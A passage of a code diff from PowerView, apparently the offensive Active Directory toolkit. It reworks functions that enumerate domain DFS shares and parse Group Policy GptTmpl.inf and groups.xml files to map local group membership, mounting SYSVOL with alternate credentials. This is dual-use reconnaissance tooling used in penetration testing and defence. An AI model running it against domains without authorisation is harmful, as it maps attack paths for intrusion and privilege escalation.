+Get-DomainDFSShare
- Switch. Mount the target groups.xml folder path as a temporary PSDrive.
+Returns all distributed file system shares for the current domain.
+
+.EXAMPLE
+
+Get-DomainDFSShare -Domain testlab.local
+
+Returns all distributed file system shares for the 'testlab.local' domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainDFSShare -Credential $Cred
+
+.OUTPUTS
+
+System.Management.Automation.PSCustomObject
+
+A custom PSObject describing the distributed file systems.
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]
+ [OutputType('System.Management.Automation.PSCustomObject')]
[CmdletBinding()]
- Param (
- [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+ Param(
+ [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainName', 'Name')]
+ [String[]]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $GroupsXMLPath,
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
[Switch]
- $UsePSDrive
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [ValidateSet('All', 'V1', '1', 'V2', '2')]
+ [String]
+ $Version = 'All'
)
- if($UsePSDrive) {
- # if we're PSDrives, create a temporary mount point
- $Parts = $GroupsXMLPath.split('\')
- $FolderPath = $Parts[0..($Parts.length-2)] -join '\'
- $FilePath = $Parts[-1]
- $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join ''
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+ function Parse-Pkt {
+ [CmdletBinding()]
+ Param(
+ [Byte[]]
+ $Pkt
+ )
+
+ $bin = $Pkt
+ $blob_version = [bitconverter]::ToUInt32($bin[0..3],0)
+ $blob_element_count = [bitconverter]::ToUInt32($bin[4..7],0)
+ $offset = 8
+ #https://msdn.microsoft.com/en-us/library/cc227147.aspx
+ $object_list = @()
+ for($i=1; $i -le $blob_element_count; $i++){
+ $blob_name_size_start = $offset
+ $blob_name_size_end = $offset + 1
+ $blob_name_size = [bitconverter]::ToUInt16($bin[$blob_name_size_start..$blob_name_size_end],0)
+
+ $blob_name_start = $blob_name_size_end + 1
+ $blob_name_end = $blob_name_start + $blob_name_size - 1
+ $blob_name = [System.Text.Encoding]::Unicode.GetString($bin[$blob_name_start..$blob_name_end])
+
+ $blob_data_size_start = $blob_name_end + 1
+ $blob_data_size_end = $blob_data_size_start + 3
+ $blob_data_size = [bitconverter]::ToUInt32($bin[$blob_data_size_start..$blob_data_size_end],0)
+
+ $blob_data_start = $blob_data_size_end + 1
+ $blob_data_end = $blob_data_start + $blob_data_size - 1
+ $blob_data = $bin[$blob_data_start..$blob_data_end]
+ switch -wildcard ($blob_name) {
+ "\siteroot" { }
+ "\domainroot*" {
+ # Parse DFSNamespaceRootOrLinkBlob object. Starts with variable length DFSRootOrLinkIDBlob which we parse first...
+ # DFSRootOrLinkIDBlob
+ $root_or_link_guid_start = 0
+ $root_or_link_guid_end = 15
+ $root_or_link_guid = [byte[]]$blob_data[$root_or_link_guid_start..$root_or_link_guid_end]
+ $guid = New-Object Guid(,$root_or_link_guid) # should match $guid_str
+ $prefix_size_start = $root_or_link_guid_end + 1
+ $prefix_size_end = $prefix_size_start + 1
+ $prefix_size = [bitconverter]::ToUInt16($blob_data[$prefix_size_start..$prefix_size_end],0)
+ $prefix_start = $prefix_size_end + 1
+ $prefix_end = $prefix_start + $prefix_size - 1
+ $prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$prefix_start..$prefix_end])
+
+ $short_prefix_size_start = $prefix_end + 1
+ $short_prefix_size_end = $short_prefix_size_start + 1
+ $short_prefix_size = [bitconverter]::ToUInt16($blob_data[$short_prefix_size_start..$short_prefix_size_end],0)
+ $short_prefix_start = $short_prefix_size_end + 1
+ $short_prefix_end = $short_prefix_start + $short_prefix_size - 1
+ $short_prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$short_prefix_start..$short_prefix_end])
+
+ $type_start = $short_prefix_end + 1
+ $type_end = $type_start + 3
+ $type = [bitconverter]::ToUInt32($blob_data[$type_start..$type_end],0)
+
+ $state_start = $type_end + 1
+ $state_end = $state_start + 3
+ $state = [bitconverter]::ToUInt32($blob_data[$state_start..$state_end],0)
+
+ $comment_size_start = $state_end + 1
+ $comment_size_end = $comment_size_start + 1
+ $comment_size = [bitconverter]::ToUInt16($blob_data[$comment_size_start..$comment_size_end],0)
+ $comment_start = $comment_size_end + 1
+ $comment_end = $comment_start + $comment_size - 1
+ if ($comment_size -gt 0) {
+ $comment = [System.Text.Encoding]::Unicode.GetString($blob_data[$comment_start..$comment_end])
+ }
+ $prefix_timestamp_start = $comment_end + 1
+ $prefix_timestamp_end = $prefix_timestamp_start + 7
+ # https://msdn.microsoft.com/en-us/library/cc230324.aspx FILETIME
+ $prefix_timestamp = $blob_data[$prefix_timestamp_start..$prefix_timestamp_end] #dword lowDateTime #dword highdatetime
+ $state_timestamp_start = $prefix_timestamp_end + 1
+ $state_timestamp_end = $state_timestamp_start + 7
+ $state_timestamp = $blob_data[$state_timestamp_start..$state_timestamp_end]
+ $comment_timestamp_start = $state_timestamp_end + 1
+ $comment_timestamp_end = $comment_timestamp_start + 7
+ $comment_timestamp = $blob_data[$comment_timestamp_start..$comment_timestamp_end]
+ $version_start = $comment_timestamp_end + 1
+ $version_end = $version_start + 3
+ $version = [bitconverter]::ToUInt32($blob_data[$version_start..$version_end],0)
+
+ # Parse rest of DFSNamespaceRootOrLinkBlob here
+ $dfs_targetlist_blob_size_start = $version_end + 1
+ $dfs_targetlist_blob_size_end = $dfs_targetlist_blob_size_start + 3
+ $dfs_targetlist_blob_size = [bitconverter]::ToUInt32($blob_data[$dfs_targetlist_blob_size_start..$dfs_targetlist_blob_size_end],0)
+
+ $dfs_targetlist_blob_start = $dfs_targetlist_blob_size_end + 1
+ $dfs_targetlist_blob_end = $dfs_targetlist_blob_start + $dfs_targetlist_blob_size - 1
+ $dfs_targetlist_blob = $blob_data[$dfs_targetlist_blob_start..$dfs_targetlist_blob_end]
+ $reserved_blob_size_start = $dfs_targetlist_blob_end + 1
+ $reserved_blob_size_end = $reserved_blob_size_start + 3
+ $reserved_blob_size = [bitconverter]::ToUInt32($blob_data[$reserved_blob_size_start..$reserved_blob_size_end],0)
+
+ $reserved_blob_start = $reserved_blob_size_end + 1
+ $reserved_blob_end = $reserved_blob_start + $reserved_blob_size - 1
+ $reserved_blob = $blob_data[$reserved_blob_start..$reserved_blob_end]
+ $referral_ttl_start = $reserved_blob_end + 1
+ $referral_ttl_end = $referral_ttl_start + 3
+ $referral_ttl = [bitconverter]::ToUInt32($blob_data[$referral_ttl_start..$referral_ttl_end],0)
+
+ #Parse DFSTargetListBlob
+ $target_count_start = 0
+ $target_count_end = $target_count_start + 3
+ $target_count = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_count_start..$target_count_end],0)
+ $t_offset = $target_count_end + 1
+
+ for($j=1; $j -le $target_count; $j++){
+ $target_entry_size_start = $t_offset
+ $target_entry_size_end = $target_entry_size_start + 3
+ $target_entry_size = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_entry_size_start..$target_entry_size_end],0)
+ $target_time_stamp_start = $target_entry_size_end + 1
+ $target_time_stamp_end = $target_time_stamp_start + 7
+ # FILETIME again or special if priority rank and priority class 0
+ $target_time_stamp = $dfs_targetlist_blob[$target_time_stamp_start..$target_time_stamp_end]
+ $target_state_start = $target_time_stamp_end + 1
+ $target_state_end = $target_state_start + 3
+ $target_state = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_state_start..$target_state_end],0)
+
+ $target_type_start = $target_state_end + 1
+ $target_type_end = $target_type_start + 3
+ $target_type = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_type_start..$target_type_end],0)
+
+ $server_name_size_start = $target_type_end + 1
+ $server_name_size_end = $server_name_size_start + 1
+ $server_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$server_name_size_start..$server_name_size_end],0)
+
+ $server_name_start = $server_name_size_end + 1
+ $server_name_end = $server_name_start + $server_name_size - 1
+ $server_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$server_name_start..$server_name_end])
+
+ $share_name_size_start = $server_name_end + 1
+ $share_name_size_end = $share_name_size_start + 1
+ $share_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$share_name_size_start..$share_name_size_end],0)
+ $share_name_start = $share_name_size_end + 1
+ $share_name_end = $share_name_start + $share_name_size - 1
+ $share_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$share_name_start..$share_name_end])
+
+ $target_list += "\\$server_name\$share_name"
+ $t_offset = $share_name_end + 1
+ }
+ }
+ }
+ $offset = $blob_data_end + 1
+ $dfs_pkt_properties = @{
+ 'Name' = $blob_name
+ 'Prefix' = $prefix
+ 'TargetList' = $target_list
+ }
+ $object_list += New-Object -TypeName PSObject -Property $dfs_pkt_properties
+ $prefix = $Null
+ $blob_name = $Null
+ $target_list = $Null
+ }
- Write-Verbose "Mounting path $GroupsXMLPath using a temp PSDrive at $RandDrive"
+ $servers = @()
+ $object_list | ForEach-Object {
+ if ($_.TargetList) {
+ $_.TargetList | ForEach-Object {
+ $servers += $_.split('\')[2]
+ }
+ }
+ }
- try {
- $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath -ErrorAction Stop
- }
- catch {
- Write-Verbose "Error mounting path $GroupsXMLPath : $_"
- return $Null
+ $servers
}
- # so we can cd/dir the new drive
- $TargetGroupsXMLPath = $RandDrive + ":\" + $FilePath
- }
- else {
- $TargetGroupsXMLPath = $GroupsXMLPath
- }
+ function Get-DomainDFSShareV1 {
+ [CmdletBinding()]
+ Param(
+ [String]
+ $Domain,
- try {
- [XML]$GroupsXMLcontent = Get-Content $TargetGroupsXMLPath -ErrorAction Stop
+ [String]
+ $SearchBase,
- # process all group properties in the XML
- $GroupsXMLcontent | Select-Xml "/Groups/Group" | Select-Object -ExpandProperty node | ForEach-Object {
+ [String]
+ $Server,
- $Groupname = $_.Properties.groupName
+ [String]
+ $SearchScope = 'Subtree',
- # extract the localgroup sid for memberof
- $GroupSID = $_.Properties.groupSid
- if(-not $GroupSID) {
- if($Groupname -match 'Administrators') {
- $GroupSID = 'S-1-5-32-544'
- }
- elseif($Groupname -match 'Remote Desktop') {
- $GroupSID = 'S-1-5-32-555'
- }
- elseif($Groupname -match 'Guests') {
- $GroupSID = 'S-1-5-32-546'
+ [Int]
+ $ResultPageSize = 200,
+
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ $DFSsearcher = Get-DomainSearcher @PSBoundParameters
+
+ if ($DFSsearcher) {
+ $DFSshares = @()
+ $DFSsearcher.filter = '(&(objectClass=fTDfs))'
+
+ try {
+ $Results = $DFSSearcher.FindAll()
+ $Results | Where-Object {$_} | ForEach-Object {
+ $Properties = $_.Properties
+ $RemoteNames = $Properties.remoteservername
+ $Pkt = $Properties.pkt
+
+ $DFSshares += $RemoteNames | ForEach-Object {
+ try {
+ if ( $_.Contains('\') ) {
+ New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_.split('\')[2]}
+ }
+ }
+ catch {
+ Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV1 error in parsing DFS share : $_"
+ }
+ }
+ }
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV1 error disposing of the Results object: $_"
+ }
+ }
+ $DFSSearcher.dispose()
+
+ if ($pkt -and $pkt[0]) {
+ Parse-Pkt $pkt[0] | ForEach-Object {
+ # If a folder doesn't have a redirection it will have a target like
+ # \\null\TestNameSpace\folder\.DFSFolderLink so we do actually want to match
+ # on 'null' rather than $Null
+ if ($_ -ne 'null') {
+ New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_}
+ }
+ }
+ }
}
- else {
- $GroupSID = Convert-NameToSid -ObjectName $Groupname | Select-Object -ExpandProperty SID
+ catch {
+ Write-Warning "[Get-DomainDFSShare] Get-DomainDFSShareV1 error : $_"
}
+ $DFSshares | Sort-Object -Unique -Property 'RemoteServerName'
}
+ }
- # extract out members added to this group
- $Members = $_.Properties.members | Select-Object -ExpandProperty Member | Where-Object { $_.action -match 'ADD' } | ForEach-Object {
- if($_.sid) { $_.sid }
- else { $_.name }
- }
+ function Get-DomainDFSShareV2 {
+ [CmdletBinding()]
+ Param(
+ [String]
+ $Domain,
+
+ [String]
+ $SearchBase,
- if ($Members) {
+ [String]
+ $Server,
- # extract out any/all filters...I hate you GPP
- if($_.filters) {
- $Filters = $_.filters.GetEnumerator() | ForEach-Object {
- New-Object -TypeName PSObject -Property @{'Type' = $_.LocalName;'Value' = $_.name}
+ [String]
+ $SearchScope = 'Subtree',
+
+ [Int]
+ $ResultPageSize = 200,
+
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ $DFSsearcher = Get-DomainSearcher @PSBoundParameters
+
+ if ($DFSsearcher) {
+ $DFSshares = @()
+ $DFSsearcher.filter = '(&(objectClass=msDFS-Linkv2))'
+ $Null = $DFSSearcher.PropertiesToLoad.AddRange(('msdfs-linkpathv2','msDFS-TargetListv2'))
+
+ try {
+ $Results = $DFSSearcher.FindAll()
+ $Results | Where-Object {$_} | ForEach-Object {
+ $Properties = $_.Properties
+ $target_list = $Properties.'msdfs-targetlistv2'[0]
+ $xml = [xml][System.Text.Encoding]::Unicode.GetString($target_list[2..($target_list.Length-1)])
+ $DFSshares += $xml.targets.ChildNodes | ForEach-Object {
+ try {
+ $Target = $_.InnerText
+ if ( $Target.Contains('\') ) {
+ $DFSroot = $Target.split('\')[3]
+ $ShareName = $Properties.'msdfs-linkpathv2'[0]
+ New-Object -TypeName PSObject -Property @{'Name'="$DFSroot$ShareName";'RemoteServerName'=$Target.split('\')[2]}
+ }
+ }
+ catch {
+ Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV2 error in parsing target : $_"
+ }
+ }
}
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainDFSShare] Error disposing of the Results object: $_"
+ }
+ }
+ $DFSSearcher.dispose()
}
- else {
- $Filters = $Null
+ catch {
+ Write-Warning "[Get-DomainDFSShare] Get-DomainDFSShareV2 error : $_"
}
+ $DFSshares | Sort-Object -Unique -Property 'RemoteServerName'
+ }
+ }
+ }
- if($Members -isnot [System.Array]) { $Members = @($Members) }
+ PROCESS {
+ $DFSshares = @()
- $GPOGroup = New-Object PSObject
- $GPOGroup | Add-Member Noteproperty 'GPOPath' $TargetGroupsXMLPath
- $GPOGroup | Add-Member Noteproperty 'Filters' $Filters
- $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName
- $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID
- $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Null
- $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Members
- $GPOGroup
+ if ($PSBoundParameters['Domain']) {
+ ForEach ($TargetDomain in $Domain) {
+ $SearcherArguments['Domain'] = $TargetDomain
+ if ($Version -match 'all|1') {
+ $DFSshares += Get-DomainDFSShareV1 @SearcherArguments
+ }
+ if ($Version -match 'all|2') {
+ $DFSshares += Get-DomainDFSShareV2 @SearcherArguments
+ }
+ }
+ }
+ else {
+ if ($Version -match 'all|1') {
+ $DFSshares += Get-DomainDFSShareV1 @SearcherArguments
+ }
+ if ($Version -match 'all|2') {
+ $DFSshares += Get-DomainDFSShareV2 @SearcherArguments
}
}
- }
- catch {
- Write-Verbose "Error parsing $TargetGroupsXMLPath : $_"
- }
- if($UsePSDrive -and $RandDrive) {
- Write-Verbose "Removing temp PSDrive $RandDrive"
- Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force
+ $DFSshares | Sort-Object -Property ('RemoteServerName','Name') -Unique
}
}
-function Get-NetGPO {
+########################################################
+#
+# GPO related functions.
+#
+########################################################
+
+function Get-GptTmpl {
<#
- .SYNOPSIS
+.SYNOPSIS
- Gets a list of all current GPOs in a domain.
+Helper to parse a GptTmpl.inf policy file path into a hashtable.
- .PARAMETER GPOname
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, Get-IniContent
- The GPO name to query for, wildcards accepted.
+.DESCRIPTION
- .PARAMETER DisplayName
+Parses a GptTmpl.inf into a custom hashtable using Get-IniContent. If a
+GPO object is passed, GPOPATH\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
+is constructed and assumed to be the parse target. If -Credential is passed,
+Add-RemoteConnection is used to mount \\TARGET\SYSVOL with the specified creds,
+the files are parsed, and the connection is destroyed later with Remove-RemoteConnection.
- The GPO display name to query for, wildcards accepted.
+.PARAMETER GptTmplPath
- .PARAMETER ComputerName
+Specifies the GptTmpl.inf file path name to parse.
- Return all GPO objects applied to a given computer (FQDN).
+.PARAMETER OutputObject
- .PARAMETER Domain
+Switch. Output a custom PSObject instead of a hashtable.
- The domain to query for GPOs, defaults to the current domain.
+.PARAMETER Credential
- .PARAMETER DomainController
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system.
- Domain controller to reflect LDAP queries through.
+.EXAMPLE
- .PARAMETER ADSpath
+Get-GptTmpl -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
- The LDAP source to search through
- e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local"
+Parse the default domain policy .inf for dev.testlab.local
- .PARAMETER PageSize
+.EXAMPLE
- The PageSize to set for the LDAP searcher object.
+Get-DomainGPO testing | Get-GptTmpl
- .PARAMETER Credential
+Parse the GptTmpl.inf policy for the GPO with display name of 'testing'.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.EXAMPLE
- .EXAMPLE
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-GptTmpl -Credential $Cred -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
- PS C:\> Get-NetGPO -Domain testlab.local
-
- Returns the GPOs in the 'testlab.local' domain.
-#>
- [CmdletBinding()]
- Param (
- [Parameter(ValueFromPipeline=$True)]
- [String]
- $GPOname = '*',
+Parse the default domain policy .inf for dev.testlab.local using alternate credentials.
- [String]
- $DisplayName,
+.OUTPUTS
- [String]
- $ComputerName,
+Hashtable
- [String]
- $Domain,
+Ouputs a hashtable representing the parsed GptTmpl.inf file.
+#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType([Hashtable])]
+ [CmdletBinding()]
+ Param (
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('gpcfilesyspath', 'Path')]
[String]
- $DomainController,
-
- [String]
- $ADSpath,
+ $GptTmplPath,
- [ValidateRange(1,10000)]
- [Int]
- $PageSize = 200,
+ [Switch]
+ $OutputObject,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- begin {
- $GPOSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
+ BEGIN {
+ $MappedPaths = @{}
}
- process {
- if ($GPOSearcher) {
+ PROCESS {
+ try {
+ if (($GptTmplPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
+ $SysVolPath = "\\$((New-Object System.Uri($GptTmplPath)).Host)\SYSVOL"
+ if (-not $MappedPaths[$SysVolPath]) {
+ # map IPC$ to this computer if it's not already
+ Add-RemoteConnection -Path $SysVolPath -Credential $Credential
+ $MappedPaths[$SysVolPath] = $True
+ }
+ }
- if($ComputerName) {
- $GPONames = @()
- $Computers = Get-NetComputer -ComputerName $ComputerName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize
+ $TargetGptTmplPath = $GptTmplPath
+ if (-not $TargetGptTmplPath.EndsWith('.inf')) {
+ $TargetGptTmplPath += '\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf'
+ }
- if(!$Computers) {
- throw "Computer $ComputerName in domain '$Domain' not found! Try a fully qualified host name"
- }
-
- # get the given computer's OU
- $ComputerOUs = @()
- ForEach($Computer in $Computers) {
- # extract all OUs a computer is a part of
- $DN = $Computer.distinguishedname
+ Write-Verbose "[Get-GptTmpl] Parsing GptTmplPath: $TargetGptTmplPath"
- $ComputerOUs += $DN.split(",") | ForEach-Object {
- if($_.startswith("OU=")) {
- $DN.substring($DN.indexof($_))
- }
- }
+ if ($PSBoundParameters['OutputObject']) {
+ $Contents = Get-IniContent -Path $TargetGptTmplPath -OutputObject -ErrorAction Stop
+ if ($Contents) {
+ $Contents | Add-Member Noteproperty 'Path' $TargetGptTmplPath
+ $Contents
}
-
- Write-Verbose "ComputerOUs: $ComputerOUs"
-
- # find all the GPOs linked to the computer's OU
- ForEach($ComputerOU in $ComputerOUs) {
- $GPONames += Get-NetOU -Domain $Domain -DomainController $DomainController -ADSpath $ComputerOU -FullData -PageSize $PageSize | ForEach-Object {
- # get any GPO links
- write-verbose "blah: $($_.name)"
- $_.gplink.split("][") | ForEach-Object {
- if ($_.startswith("LDAP")) {
- $_.split(";")[0]
- }
- }
- }
+ }
+ else {
+ $Contents = Get-IniContent -Path $TargetGptTmplPath -ErrorAction Stop
+ if ($Contents) {
+ $Contents['Path'] = $TargetGptTmplPath
+ $Contents
}
-
- Write-Verbose "GPONames: $GPONames"
+ }
+ }
+ catch {
+ Write-Verbose "[Get-GptTmpl] Error parsing $TargetGptTmplPath : $_"
+ }
+ }
- # find any GPOs linked to the site for the given computer
- $ComputerSite = (Get-SiteName -ComputerName $ComputerName).SiteName
- if($ComputerSite -and ($ComputerSite -notlike 'Error*')) {
- $GPONames += Get-NetSite -SiteName $ComputerSite -FullData | ForEach-Object {
- if($_.gplink) {
- $_.gplink.split("][") | ForEach-Object {
- if ($_.startswith("LDAP")) {
- $_.split(";")[0]
- }
- }
- }
- }
- }
+ END {
+ # remove the SYSVOL mappings
+ $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ }
+ }
+}
- $GPONames | Where-Object{$_ -and ($_ -ne '')} | ForEach-Object {
- # use the gplink as an ADS path to enumerate all GPOs for the computer
- $GPOSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_ -PageSize $PageSize
- $GPOSearcher.filter="(&(objectCategory=groupPolicyContainer)(name=$GPOname))"
+function Get-GroupsXML {
+<#
+.SYNOPSIS
- try {
- $Results = $GPOSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- $Out = Convert-LDAPProperty -Properties $_.Properties
- $Out | Add-Member Noteproperty 'ComputerName' $ComputerName
- $Out
- }
- $Results.dispose()
- $GPOSearcher.dispose()
- }
- catch {
- Write-Warning $_
- }
+Helper to parse a groups.xml file path into a custom object.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertTo-SID
+
+.DESCRIPTION
+
+Parses a groups.xml into a custom object. If -Credential is passed,
+Add-RemoteConnection is used to mount \\TARGET\SYSVOL with the specified creds,
+the files are parsed, and the connection is destroyed later with Remove-RemoteConnection.
+
+.PARAMETER GroupsXMLpath
+
+Specifies the groups.xml file path name to parse.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system.
+
+.OUTPUTS
+
+PowerView.GroupsXML
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.GroupsXML')]
+ [CmdletBinding()]
+ Param (
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Path')]
+ [String]
+ $GroupsXMLPath,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ $MappedPaths = @{}
+ }
+
+ PROCESS {
+ try {
+ if (($GroupsXMLPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
+ $SysVolPath = "\\$((New-Object System.Uri($GroupsXMLPath)).Host)\SYSVOL"
+ if (-not $MappedPaths[$SysVolPath]) {
+ # map IPC$ to this computer if it's not already
+ Add-RemoteConnection -Path $SysVolPath -Credential $Credential
+ $MappedPaths[$SysVolPath] = $True
}
}
- else {
- if($DisplayName) {
- $GPOSearcher.filter="(&(objectCategory=groupPolicyContainer)(displayname=$DisplayName))"
- }
- else {
- $GPOSearcher.filter="(&(objectCategory=groupPolicyContainer)(name=$GPOname))"
- }
+ [XML]$GroupsXMLcontent = Get-Content -Path $GroupsXMLPath -ErrorAction Stop
- try {
- $Results = $GPOSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- if($ADSPath -and ($ADSpath -Match '^GC://')) {
- $Properties = Convert-LDAPProperty -Properties $_.Properties
- try {
- $GPODN = $Properties.distinguishedname
- $GPODomain = $GPODN.subString($GPODN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'
- $gpcfilesyspath = "\\$GPODomain\SysVol\$GPODomain\Policies\$($Properties.cn)"
- $Properties | Add-Member Noteproperty 'gpcfilesyspath' $gpcfilesyspath
- $Properties
- }
- catch {
- $Properties
- }
+ # process all group properties in the XML
+ $GroupsXMLcontent | Select-Xml "/Groups/Group" | Select-Object -ExpandProperty node | ForEach-Object {
+
+ $Groupname = $_.Properties.groupName
+
+ # extract the localgroup sid for memberof
+ $GroupSID = $_.Properties.groupSid
+ if (-not $GroupSID) {
+ if ($Groupname -match 'Administrators') {
+ $GroupSID = 'S-1-5-32-544'
+ }
+ elseif ($Groupname -match 'Remote Desktop') {
+ $GroupSID = 'S-1-5-32-555'
+ }
+ elseif ($Groupname -match 'Guests') {
+ $GroupSID = 'S-1-5-32-546'
+ }
+ else {
+ if ($PSBoundParameters['Credential']) {
+ $GroupSID = ConvertTo-SID -ObjectName $Groupname -Credential $Credential
}
else {
- # convert/process the LDAP fields for each result
- Convert-LDAPProperty -Properties $_.Properties
+ $GroupSID = ConvertTo-SID -ObjectName $Groupname
}
}
- $Results.dispose()
- $GPOSearcher.dispose()
}
- catch {
- Write-Warning $_
+
+ # extract out members added to this group
+ $Members = $_.Properties.members | Select-Object -ExpandProperty Member | Where-Object { $_.action -match 'ADD' } | ForEach-Object {
+ if ($_.sid) { $_.sid }
+ else { $_.name }
+ }
+
+ if ($Members) {
+ # extract out any/all filters...I hate you GPP
+ if ($_.filters) {
+ $Filters = $_.filters.GetEnumerator() | ForEach-Object {
+ New-Object -TypeName PSObject -Property @{'Type' = $_.LocalName;'Value' = $_.name}
+ }
+ }
+ else {
+ $Filters = $Null
+ }
+
+ if ($Members -isnot [System.Array]) { $Members = @($Members) }
+
+ $GroupsXML = New-Object PSObject
+ $GroupsXML | Add-Member Noteproperty 'GPOPath' $TargetGroupsXMLPath
+ $GroupsXML | Add-Member Noteproperty 'Filters' $Filters
+ $GroupsXML | Add-Member Noteproperty 'GroupName' $GroupName
+ $GroupsXML | Add-Member Noteproperty 'GroupSID' $GroupSID
+ $GroupsXML | Add-Member Noteproperty 'GroupMemberOf' $Null
